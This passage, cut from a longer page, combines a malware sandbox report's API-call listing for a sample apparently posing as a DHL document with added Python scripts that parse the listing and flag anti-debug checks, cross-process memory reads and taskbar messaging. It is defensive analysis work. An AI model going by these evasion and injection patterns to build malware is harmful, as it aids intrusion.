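• SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C59509
• SendMessageW.USER32(?,0000102B,?,00000000), ref: 00C5952E
Strings
APIs
• SendMessageW.USER32(?,00000406,00000000,00000000), ref: 00C595FB
• SendMessageW.USER32(?,0000040D,?,00000000), ref: 00C5962E
  • Part of subcall function 00C61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C614B1
  • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
Strings
APIs
  • Part of subcall function 00C3B314: _memset.LIBCMT ref: 00C3B321
• IsDebuggerPresent.KERNEL32(?,?,?,00C0100A), ref: 00C3B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C0100A), ref: 00C3B303
Strings
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00C41775
  • Part of subcall function 00C7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C4195E,?), ref: 00C7BFFE
  • Part of subcall function 00C7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C7C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C4196D
Strings
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C5954C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C59564
Strings
"""

# One listing line: optional "Part of subcall function X:" prefix, API.MODULE(args), ref: ADDR.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Combinations worth a second look (example's own rule set); each API alone is common in benign code.
RULES = {
    "cross-process memory access": {"ReadProcessMemory", "WriteProcessMemory"},
    "anti-debug check": {"IsDebuggerPresent", "OutputDebugStringW", "OutputDebugStringA"},
    "dynamic API resolution": {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"},
}

# Common-control message IDs seen in the listing (LVM_FIRST = 0x1000, TV_FIRST = 0x1100).
MESSAGE_NAMES = {
    0x1004: "LVM_GETITEMCOUNT",
    0x102B: "LVM_SETITEMSTATE",
    0x102C: "LVM_GETITEMSTATE",
    0x1073: "LVM_GETITEMTEXTW",
    0x110A: "TVM_GETNEXTITEM",
}


def parse_entries(text: str) -> List[List[Dict]]:
    """Split a report excerpt into per-function entries, one per 'APIs' header."""
    entries: List[List[Dict]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = API_LINE.match(line)
        if not m or not entries:
            continue
        raw_args = m.group("args")
        entries[-1].append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw_args.split(",")] if raw_args else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub") is not None,
        })
    return entries


def decode_messages(entry: List[Dict]) -> List[str]:
    """Name the window message passed as the second argument of each SendMessageW/PostMessageW."""
    names = []
    for call in entry:
        if call["api"] not in ("SendMessageW", "PostMessageW") or len(call["args"]) < 2:
            continue
        try:
            msg = int(call["args"][1], 16)
        except ValueError:  # '?' means the sandbox could not recover the value
            continue
        names.append(MESSAGE_NAMES.get(msg, f"0x{msg:04X}"))
    return names


def classify(entry: List[Dict]) -> List[str]:
    """Tag an entry by the API combinations it contains."""
    apis = {c["api"] for c in entry}
    tags = [tag for tag, needles in RULES.items() if apis & needles]
    # Memory access paired with LVM_* messages is the cross-process list-view pattern the
    # AutoIt runtime uses for ControlListView(); tag it so it is not read as a bare injection.
    if "cross-process memory access" in tags and any(n.startswith("LVM_") for n in decode_messages(entry)):
        tags.append("list-view control access")
    return tags


def triage(text: str) -> List[Dict]:
    """Return one summary row per function entry."""
    rows = []
    for i, entry in enumerate(parse_entries(text)):
        rows.append({
            "entry": i,
            "refs": [c["ref"] for c in entry if not c["subcall"]],
            "apis": [c["api"] for c in entry],
            "messages": decode_messages(entry),
            "tags": classify(entry),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT):
        if row["tags"]:
            print(f"entry {row['entry']} refs={row['refs']} tags={row['tags']} msgs={row['messages']}")
```

Run it against a saved copy of the report's disassembly section to get a per-function shortlist; entries with only list-view or tree-view messages and no memory access (the LVM_GETITEMCOUNT/LVM_GETITEMSTATE entry) come out untagged, which is the intended behaviour for runtime control helpers.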
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00C41775
                                                                                          • Part of subcall function 00C7BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C4195E,?), ref: 00C7BFFE
                                                                                          • Part of subcall function 00C7BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C7C010
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C4196D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                        • String ID: WIN_XPe
                                                                                        • API String ID: 582185067-3257408948
                                                                                        • Opcode ID: cf6ba1cf651189935fd0500554df7bc2066b30ddd0ef8ee400e7771480b71063
                                                                                        • Instruction ID: 0c9fd811ac29177f62d3a1a98149882c6649d41f933704d6bce10ec8cac7e1c5
                                                                                        • Opcode Fuzzy Hash: cf6ba1cf651189935fd0500554df7bc2066b30ddd0ef8ee400e7771480b71063
                                                                                        • Instruction Fuzzy Hash: 5EF0ED70C04109DFDB15DB91C988BECBBF8BB08301F680095F562A20A0D7759F85DF64
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C859AE
                                                                                        • PostMessageW.USER32(00000000), ref: 00C859B5
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                         • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: c51f327dbfbafe35bb11723f33c50205b2e1594edbf0c59aaf274736f10c0440
                                                                                        • Instruction ID: 0f9c10b556d61a65311a73051721d671e6f2430762faaafa53146adc87182002
                                                                                        • Opcode Fuzzy Hash: c51f327dbfbafe35bb11723f33c50205b2e1594edbf0c59aaf274736f10c0440
                                                                                        • Instruction Fuzzy Hash: AAD0C9313C43117AE674BB709C4BFDA6614AB04B50F100839B245AA1D0D9E0A805C758
                                                                                        APIs
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8596E
                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C85981
                                                                                          • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 529655941-2988720461
                                                                                        • Opcode ID: 4d90cb3e0f8f183604529e092dbb89218f61f57772afb7cbc8a2c632cb495e5c
                                                                                        • Instruction ID: 4340eb61a1a09cf75e49a561228a652ead039611c572d5885a9c2002c9071fb2
                                                                                        • Opcode Fuzzy Hash: 4d90cb3e0f8f183604529e092dbb89218f61f57772afb7cbc8a2c632cb495e5c
                                                                                        • Instruction Fuzzy Hash: 98D0C931384311B6E674BB709C5BFDA6A14AF00B50F100839B249AA1D0D9E0A805C758
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C593E9
                                                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C593F7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3850602802-2594219639
                                                                                        • Opcode ID: 1439ef4c2ded262467a550c7ca7e6a77f13c897f6c7cb3d5e7ee57a30f994e70
                                                                                        • Instruction ID: 566790dfcc252aa8b165ee13ef178ec09a178c76897fb40d787cc9575b11071b
                                                                                        • Opcode Fuzzy Hash: 1439ef4c2ded262467a550c7ca7e6a77f13c897f6c7cb3d5e7ee57a30f994e70
                                                                                        • Instruction Fuzzy Hash: 99C00231151194BAEA211B77AC0DE8B3E3DE7CAF52721026CB211950B596650096D628
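The two functions above are easier to read once the raw message numbers are resolved: the first locates the Explorer taskbar by its window class (Shell_TrayWnd) and posts message 0x0111 (WM_COMMAND) to it with a Sleep in a subcall; the second sends 0x101F (LVM_GETHEADER, LVM_FIRST + 31) and 0x1200 (HDM_GETITEMCOUNT, HDM_FIRST + 0), which is list-view header enumeration of the kind a GUI runtime such as the AutoIt interpreter the report suspects would carry. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of its tooling. It parses the "APIs" lines in the exact format the report renders them (the sample input is copied from this section), resolves the Send/PostMessage uMsg argument using constants from the Windows SDK headers (winuser.h, commctrl.h), and flags a FindWindow on Shell_TrayWnd followed by a WM_COMMAND as a triage hit. The pairing heuristic and the ApiCall record layout are my own choices, not anything the report defines.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample input: the two "APIs" lists from this report section,
# in the format Joe Sandbox renders them (bullet, API.MODULE(args), ref: address).
SAMPLE_APIS = """
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C8596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C85981
  • Part of subcall function 00C65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C652BC
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C593E9
• SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00C593F7
"""

# Window-message constants from the Windows SDK (winuser.h / commctrl.h).
# Only the messages that occur in this section are resolved; anything else
# is reported as a hex number.
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x101F: "LVM_GETHEADER",      # LVM_FIRST (0x1000) + 31
    0x1200: "HDM_GETITEMCOUNT",   # HDM_FIRST (0x1200) + 0
}

Arg = Union[int, str, None]

# One report line: optional "Part of subcall function XXXXXXXX:" prefix,
# then API.MODULE(args), then ", ref: XXXXXXXX".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Arg]            # int for 8-hex-digit values, None for '?', str otherwise
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # parent function when the call was inlined from a subcall


def _parse_arg(raw: str) -> Arg:
    raw = raw.strip()
    if raw == "?":
        return None            # the sandbox could not recover this argument
    if re.fullmatch(r"[0-9A-Fa-f]{8}", raw):
        return int(raw, 16)
    return raw                 # a string literal, e.g. a window class name


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every APIs bullet in `text`; non-matching lines (headings, blanks) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # A string literal containing a comma would be split here; none occurs
        # in this report, so a plain split on ',' is sufficient.
        args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            api=m["api"], module=m["module"], args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["parent"], 16) if m["parent"] else None,
        ))
    return calls


def message_name(call: ApiCall) -> Optional[str]:
    """Resolve the uMsg argument (second parameter) of Send/PostMessage calls."""
    if call.api not in ("SendMessageW", "PostMessageW", "SendMessageA", "PostMessageA"):
        return None
    if len(call.args) < 2 or not isinstance(call.args[1], int):
        return None
    return WINDOW_MESSAGES.get(call.args[1], "0x%04X" % call.args[1])


def find_taskbar_commands(calls: List[ApiCall]) -> List[int]:
    """Call-site addresses of WM_COMMAND messages sent or posted right after a
    FindWindow on Shell_TrayWnd. Calls inlined from subcalls (such as the Sleep
    above) are ignored so they do not break the pairing. Heuristic, not a rule."""
    hits = []
    seen_taskbar = False
    for c in calls:
        if c.subcall_of is not None:
            continue
        if c.api.startswith("FindWindow") and "Shell_TrayWnd" in c.args:
            seen_taskbar = True
        elif seen_taskbar and message_name(c) == "WM_COMMAND":
            hits.append(c.ref)
            seen_taskbar = False
    return hits


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    for call in parsed:
        print("%08X %s.%s %s" % (call.ref, call.api, call.module, message_name(call) or ""))
    print("taskbar WM_COMMAND at:", ["%08X" % r for r in find_taskbar_commands(parsed)])
```

Run as-is it lists the five calls with their resolved message names and reports the PostMessageW at 00C85981 as the taskbar WM_COMMAND hit. The same parser works on any exported Joe Sandbox "APIs" list; extend WINDOW_MESSAGES only with constants you have checked against the SDK headers, since a wrong name is worse than a hex number.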